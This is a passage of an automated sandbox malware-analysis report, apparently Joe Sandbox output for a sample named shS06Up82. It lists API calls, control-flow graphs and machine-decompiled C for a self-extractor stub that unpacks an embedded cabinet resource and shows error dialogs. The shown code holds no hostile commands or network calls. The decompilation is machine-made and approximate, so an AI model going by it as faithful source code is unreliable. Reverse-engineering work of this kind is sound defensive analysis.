                                                                                                                                                                                                      0x003e5baf
                                                                                                                                                                                                      0x003e5bbd
                                                                                                                                                                                                      0x003e5bd8
                                                                                                                                                                                                      0x003e5bde
                                                                                                                                                                                                      0x003e5be3
                                                                                                                                                                                                      0x003e5bec
                                                                                                                                                                                                      0x003e5bf0
                                                                                                                                                                                                      0x003e5bfc
                                                                                                                                                                                                      0x003e5c02
                                                                                                                                                                                                      0x003e5c02
                                                                                                                                                                                                      0x003e5c02
                                                                                                                                                                                                      0x003e5c04
                                                                                                                                                                                                      0x003e5c04
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5c04
                                                                                                                                                                                                      0x003e5a27
                                                                                                                                                                                                      0x003e5a3a
                                                                                                                                                                                                      0x003e5a46
                                                                                                                                                                                                      0x003e5a48
                                                                                                                                                                                                      0x003e5a4a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5a64
                                                                                                                                                                                                      0x003e5a6a
                                                                                                                                                                                                      0x003e5a6c
                                                                                                                                                                                                      0x003e5abc
                                                                                                                                                                                                      0x003e5ac2
                                                                                                                                                                                                      0x003e5ac9
                                                                                                                                                                                                      0x003e5aca
                                                                                                                                                                                                      0x003e5aca
                                                                                                                                                                                                      0x003e5acc
                                                                                                                                                                                                      0x003e5acc
                                                                                                                                                                                                      0x003e5acf
                                                                                                                                                                                                      0x003e5ad1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5ad3
                                                                                                                                                                                                      0x003e5ad6
                                                                                                                                                                                                      0x003e5ad8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5ada
                                                                                                                                                                                                      0x003e5adc
                                                                                                                                                                                                      0x003e5add
                                                                                                                                                                                                      0x003e5add
                                                                                                                                                                                                      0x003e5ae0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5ae0
                                                                                                                                                                                                      0x003e5ae2
                                                                                                                                                                                                      0x003e5ae4
                                                                                                                                                                                                      0x003e5ae6
                                                                                                                                                                                                      0x003e5ae6
                                                                                                                                                                                                      0x003e5ae6
                                                                                                                                                                                                      0x003e5ae9
                                                                                                                                                                                                      0x003e5aeb
                                                                                                                                                                                                      0x003e5af0
                                                                                                                                                                                                      0x003e5af6
                                                                                                                                                                                                      0x003e5af8
                                                                                                                                                                                                      0x003e5af9
                                                                                                                                                                                                      0x003e5af9
                                                                                                                                                                                                      0x003e5afb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5afd
                                                                                                                                                                                                      0x003e5aff
                                                                                                                                                                                                      0x003e5b00
                                                                                                                                                                                                      0x003e5b03
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5b03
                                                                                                                                                                                                      0x003e5b05
                                                                                                                                                                                                      0x003e5b08
                                                                                                                                                                                                      0x003e5b20
                                                                                                                                                                                                      0x003e5b27
                                                                                                                                                                                                      0x003e5b52
                                                                                                                                                                                                      0x003e5b52
                                                                                                                                                                                                      0x003e5b5b
                                                                                                                                                                                                      0x003e5b62
                                                                                                                                                                                                      0x003e5b6b
                                                                                                                                                                                                      0x003e5b6d
                                                                                                                                                                                                      0x003e5b76
                                                                                                                                                                                                      0x003e5b7d
                                                                                                                                                                                                      0x003e5b83
                                                                                                                                                                                                      0x003e5b7f
                                                                                                                                                                                                      0x003e5b7f
                                                                                                                                                                                                      0x003e5b7f
                                                                                                                                                                                                      0x003e5b6f
                                                                                                                                                                                                      0x003e5b72
                                                                                                                                                                                                      0x003e5b72
                                                                                                                                                                                                      0x003e5b85
                                                                                                                                                                                                      0x003e5b98
                                                                                                                                                                                                      0x003e5b9e
                                                                                                                                                                                                      0x003e5b87
                                                                                                                                                                                                      0x003e5b8f
                                                                                                                                                                                                      0x003e5b8f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5b85
                                                                                                                                                                                                      0x003e5b29
                                                                                                                                                                                                      0x003e5b33
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5b35
                                                                                                                                                                                                      0x003e5b48
                                                                                                                                                                                                      0x003e5b4a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5b4a
                                                                                                                                                                                                      0x003e5b0f
                                                                                                                                                                                                      0x003e5b16
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5b16
                                                                                                                                                                                                      0x003e5a7c
                                                                                                                                                                                                      0x003e5a8a
                                                                                                                                                                                                      0x003e5aa5
                                                                                                                                                                                                      0x003e5aab
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e59bb
                                                                                                                                                                                                      0x003e59c0
                                                                                                                                                                                                      0x003e59c7
                                                                                                                                                                                                      0x003e59d1
                                                                                                                                                                                                      0x003e59d6
                                                                                                                                                                                                      0x003e5c05
                                                                                                                                                                                                      0x003e5c14
                                                                                                                                                                                                      0x003e5c14

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003E59A8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 003E59AF
                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 003E5A13
                                                                                                                                                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 003E5A40
                                                                                                                                                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003E5A64
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E5A7C
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003E5A98
                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 003E5AA5
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 003E5BFC
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                        • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4237285672-0
                                                                                                                                                                                                      • Opcode ID: 6228c6c3c04576f7fe0a5c896d0ebfcb5ca5917c6344a087f14117b8cdccfc49
                                                                                                                                                                                                      • Instruction ID: 59d3013c3e3d58d412669bc0f212e54c9aae8590eca204709f0d0376b6df108c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6228c6c3c04576f7fe0a5c896d0ebfcb5ca5917c6344a087f14117b8cdccfc49
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF7185B19006AD9FDB27DB61CCC5BFB77ADEB48344F1446A9F5059A1C0DA309E848B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 374 3e4fe0-3e501a call 3e468f FindResourceA LoadResource LockResource 377 3e5020-3e5027 374->377 378 3e5161-3e5163 374->378 379 3e5029-3e5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 3e5057-3e505e call 3e4efd 377->380 379->380 383 3e507c-3e50b4 380->383 384 3e5060-3e5077 call 3e44b9 380->384 389 3e50e8-3e5104 call 3e44b9 383->389 390 3e50b6-3e50da 383->390 388 3e5107-3e510e 384->388 391 3e511d-3e511f 388->391 392 3e5110-3e5117 FreeResource 388->392 402 3e5106 389->402 401 3e50dc 390->401 390->402 394 3e513a-3e5141 391->394 395 3e5121-3e5127 391->395 392->391 399 3e515f 394->399 400 3e5143-3e514a 394->400 395->394 398 3e5129-3e5135 call 3e44b9 395->398 398->394 399->378 400->399 404 3e514c-3e5159 SendMessageA 400->404 405 3e50e3-3e50e6 401->405 402->388 404->399 405->389 405->402
                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E003E4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				struct HWND__* _t9;
                                                                                                                                                                                                      				int _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      				struct HWND__* _t27;
                                                                                                                                                                                                      				intOrPtr _t29;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				CHAR* _t36;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				intOrPtr _t47;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t36 = "CABINET";
                                                                                                                                                                                                      				 *0x3e9144 = E003E468F(_t36, 0, 0);
                                                                                                                                                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                      				 *0x3e9140 = _t8;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t9 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      				if(_t9 != 0) {
                                                                                                                                                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                      					ShowWindow(GetDlgItem( *0x3e8584, 0x841), 5);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t10 = E003E4EFD(0, 0);
                                                                                                                                                                                                      				if(_t10 != 0) {
                                                                                                                                                                                                      					__imp__#20(E003E4CA0, E003E4CC0, E003E4980, E003E4A50, E003E4AD0, E003E4B60, E003E4BC0, 1, 0x3e9148, _t33);
                                                                                                                                                                                                      					_t34 = _t10;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						_t29 =  *0x3e9148; // 0x0
                                                                                                                                                                                                      						_t24 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      						E003E44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#22(_t34, "*MEMCAB", 0x3e1140, 0, E003E4CD0, 0, 0x3e9140); // executed
                                                                                                                                                                                                      					_t37 = _t10;
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#23(_t34); // executed
                                                                                                                                                                                                      					if(_t10 != 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      					E003E44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_t12 =  *0x3e9140; // 0x0
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						FreeResource(_t12);
                                                                                                                                                                                                      						 *0x3e9140 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						_t47 =  *0x3e91d8; // 0x0
                                                                                                                                                                                                      						if(_t47 == 0) {
                                                                                                                                                                                                      							E003E44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(( *0x3e8a38 & 0x00000001) == 0 && ( *0x3e9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                      						SendMessageA( *0x3e8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t37;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}
















                                                                                                                                                                                                      0x003e4fe0
                                                                                                                                                                                                      0x003e4fe6
                                                                                                                                                                                                      0x003e4ff9
                                                                                                                                                                                                      0x003e500d
                                                                                                                                                                                                      0x003e5013
                                                                                                                                                                                                      0x003e501a
                                                                                                                                                                                                      0x003e5163
                                                                                                                                                                                                      0x003e5163
                                                                                                                                                                                                      0x003e5020
                                                                                                                                                                                                      0x003e5027
                                                                                                                                                                                                      0x003e5037
                                                                                                                                                                                                      0x003e5051
                                                                                                                                                                                                      0x003e5051
                                                                                                                                                                                                      0x003e5057
                                                                                                                                                                                                      0x003e505e
                                                                                                                                                                                                      0x003e50a7
                                                                                                                                                                                                      0x003e50ad
                                                                                                                                                                                                      0x003e50b4
                                                                                                                                                                                                      0x003e50e8
                                                                                                                                                                                                      0x003e50e8
                                                                                                                                                                                                      0x003e50ee
                                                                                                                                                                                                      0x003e50ff
                                                                                                                                                                                                      0x003e5104
                                                                                                                                                                                                      0x003e5106
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5106
                                                                                                                                                                                                      0x003e50cd
                                                                                                                                                                                                      0x003e50d3
                                                                                                                                                                                                      0x003e50da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e50dd
                                                                                                                                                                                                      0x003e50e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5060
                                                                                                                                                                                                      0x003e5060
                                                                                                                                                                                                      0x003e5070
                                                                                                                                                                                                      0x003e5075
                                                                                                                                                                                                      0x003e5107
                                                                                                                                                                                                      0x003e5107
                                                                                                                                                                                                      0x003e510e
                                                                                                                                                                                                      0x003e5111
                                                                                                                                                                                                      0x003e5117
                                                                                                                                                                                                      0x003e5117
                                                                                                                                                                                                      0x003e511f
                                                                                                                                                                                                      0x003e5121
                                                                                                                                                                                                      0x003e5127
                                                                                                                                                                                                      0x003e5135
                                                                                                                                                                                                      0x003e5135
                                                                                                                                                                                                      0x003e5127
                                                                                                                                                                                                      0x003e5141
                                                                                                                                                                                                      0x003e5159
                                                                                                                                                                                                      0x003e5159
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e515f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 003E4FFE
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 003E5006
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 003E500D
                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,00000842), ref: 003E5030
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 003E5037
                                                                                                                                                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 003E504A
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 003E5051
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 003E5111
                                                                                                                                                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 003E5159
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                      • API String ID: 1305606123-2642027498
                                                                                                                                                                                                      • Opcode ID: c57979b0b994f8614a9cdd722a068737aa03955ed55fa7a9cfe7ebc762cd2588
                                                                                                                                                                                                      • Instruction ID: 085fc155c1c6a5119b4861e46c9a457e11bf00f553fbf1b54deffdafdc7483e7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c57979b0b994f8614a9cdd722a068737aa03955ed55fa7a9cfe7ebc762cd2588
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D23128B0B407E6BBDB335B63ADC9FA7369CA708759F050725F905AE2D1CAB49C008760
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 406 3e44b9-3e44f8 407 3e44fe-3e4525 LoadStringA 406->407 408 3e4679-3e467b 406->408 410 3e4527-3e452e call 3e681f 407->410 411 3e4562-3e4568 407->411 409 3e467c-3e468c call 3e6ce0 408->409 418 3e453f 410->418 419 3e4530-3e453d call 3e67c9 410->419 414 3e456b-3e4570 411->414 414->414 417 3e4572-3e457c 414->417 420 3e457e-3e4580 417->420 421 3e45c9-3e45cb 417->421 425 3e4544-3e4554 MessageBoxA 418->425 419->418 419->425 426 3e4583-3e4588 420->426 423 3e45cd-3e45cf 421->423 424 3e4607-3e4617 LocalAlloc 421->424 428 3e45d2-3e45d7 423->428 429 3e455a-3e455d 424->429 430 3e461d-3e4628 call 3e1680 424->430 425->429 426->426 431 3e458a-3e458c 426->431 428->428 432 3e45d9-3e45ed LocalAlloc 428->432 429->409 436 3e462d-3e463d MessageBeep call 3e681f 430->436 434 3e458f-3e4594 431->434 432->429 435 3e45f3-3e4605 call 3e171e 432->435 434->434 437 3e4596-3e45ad LocalAlloc 434->437 435->436 444 3e464e 436->444 445 3e463f-3e464c call 3e67c9 436->445 437->429 438 3e45af-3e45c7 call 3e171e 437->438 438->436 448 3e4653-3e4677 MessageBoxA LocalFree 444->448 445->444 445->448 448->409
                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E003E44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v64;
                                                                                                                                                                                                      				char _v576;
                                                                                                                                                                                                      				void* _v580;
                                                                                                                                                                                                      				struct HWND__* _v584;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                                                                      				intOrPtr _t58;
                                                                                                                                                                                                      				intOrPtr _t59;
                                                                                                                                                                                                      				int _t64;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				intOrPtr* _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                                                                      				intOrPtr* _t76;
                                                                                                                                                                                                      				intOrPtr* _t77;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                                      				intOrPtr* _t84;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t75 = __edx;
                                                                                                                                                                                                      				_t34 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                      				_v584 = __ecx;
                                                                                                                                                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                      				_t67 = _a4;
                                                                                                                                                                                                      				_t69 = 0xd;
                                                                                                                                                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                      				_v580 = _t37;
                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                      				if(( *0x3e8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      					_t39 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_v576 = 0;
                                                                                                                                                                                                      					LoadStringA( *0x3e9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                      					if(_v576 != 0) {
                                                                                                                                                                                                      						_t73 =  &_v576;
                                                                                                                                                                                                      						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                      						_t75 = _t16;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t43 =  *_t73;
                                                                                                                                                                                                      							_t73 = _t73 + 1;
                                                                                                                                                                                                      						} while (_t43 != 0);
                                                                                                                                                                                                      						_t84 = _v580;
                                                                                                                                                                                                      						_t74 = _t73 - _t75;
                                                                                                                                                                                                      						if(_t84 == 0) {
                                                                                                                                                                                                      							if(_t67 == 0) {
                                                                                                                                                                                                      								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                      								_t83 = _t27;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t75 = _t83;
                                                                                                                                                                                                      									_t74 = _t80;
                                                                                                                                                                                                      									E003E1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t76 = _t67;
                                                                                                                                                                                                      								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                      								_t85 = _t24;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t55 =  *_t76;
                                                                                                                                                                                                      									_t76 = _t76 + 1;
                                                                                                                                                                                                      								} while (_t55 != 0);
                                                                                                                                                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                      								_t83 = _t25 + _t74;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E003E171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t77 = _t67;
                                                                                                                                                                                                      							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                      							_t81 = _t18;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t58 =  *_t77;
                                                                                                                                                                                                      								_t77 = _t77 + 1;
                                                                                                                                                                                                      							} while (_t58 != 0);
                                                                                                                                                                                                      							_t75 = _t77 - _t81;
                                                                                                                                                                                                      							_t82 = _t84 + 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t59 =  *_t84;
                                                                                                                                                                                                      								_t84 = _t84 + 1;
                                                                                                                                                                                                      							} while (_t59 != 0);
                                                                                                                                                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                      							_t80 = _t44;
                                                                                                                                                                                                      							if(_t80 == 0) {
                                                                                                                                                                                                      								goto L6;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_push(_v580);
                                                                                                                                                                                                      								E003E171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      								L23:
                                                                                                                                                                                                      								MessageBeep(_a12);
                                                                                                                                                                                                      								if(E003E681F(_t67) == 0) {
                                                                                                                                                                                                      									L25:
                                                                                                                                                                                                      									_t49 = 0x10000;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t54 = E003E67C9(_t74, _t74);
                                                                                                                                                                                                      									_t49 = 0x190000;
                                                                                                                                                                                                      									if(_t54 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                      								_t83 = _t52;
                                                                                                                                                                                                      								LocalFree(_t80);
                                                                                                                                                                                                      								_t39 = _t52;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(E003E681F(_t67) == 0) {
                                                                                                                                                                                                      							L4:
                                                                                                                                                                                                      							_t64 = 0x10010;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t66 = E003E67C9(0, 0);
                                                                                                                                                                                                      							_t64 = 0x190010;
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								goto L4;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                      			}



































                                                                                                                                                                                                      0x003e44b9
                                                                                                                                                                                                      0x003e44c4
                                                                                                                                                                                                      0x003e44cb
                                                                                                                                                                                                      0x003e44d8
                                                                                                                                                                                                      0x003e44e4
                                                                                                                                                                                                      0x003e44eb
                                                                                                                                                                                                      0x003e44ee
                                                                                                                                                                                                      0x003e44ef
                                                                                                                                                                                                      0x003e44ef
                                                                                                                                                                                                      0x003e44f1
                                                                                                                                                                                                      0x003e44f7
                                                                                                                                                                                                      0x003e44f8
                                                                                                                                                                                                      0x003e467b
                                                                                                                                                                                                      0x003e44fe
                                                                                                                                                                                                      0x003e4509
                                                                                                                                                                                                      0x003e4518
                                                                                                                                                                                                      0x003e4525
                                                                                                                                                                                                      0x003e4562
                                                                                                                                                                                                      0x003e4568
                                                                                                                                                                                                      0x003e4568
                                                                                                                                                                                                      0x003e456b
                                                                                                                                                                                                      0x003e456b
                                                                                                                                                                                                      0x003e456d
                                                                                                                                                                                                      0x003e456e
                                                                                                                                                                                                      0x003e4572
